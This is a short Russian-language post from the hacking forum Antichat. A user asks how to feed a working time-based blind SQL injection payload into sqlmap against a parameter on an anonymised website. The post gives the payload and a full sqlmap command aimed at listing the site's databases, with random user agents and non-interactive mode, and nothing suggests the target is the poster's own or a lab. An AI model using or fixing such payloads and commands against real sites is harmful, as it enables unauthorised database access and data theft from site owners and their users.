ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Sqlmap не видит уязвимость. (https://forum.antichat.xyz/showthread.php?t=583983)

Emince 16.09.2024 17:27
Доброго времени суток!
Есть уязвимость в param1
Код:
https://site/index.php?param1=1&param2=1&param3=0&param4=es&param5=1
, payload выглядит так
Код:
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
.Sqlmap, в упор, не видит уязвимость в param1.
Пытался передать этот payload в sqlmap вот так
Код:
sqlmap.py -p param1 -u "https://site/index.php?param1=1&param2=1&param3=0&param4=es&param5=1 --dbs --random-agent --batch --suffix "0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z"
, ничего не вышло.
Прошу подсказать, как корректно передать указанный payload в sqlmap?


Время: 14:00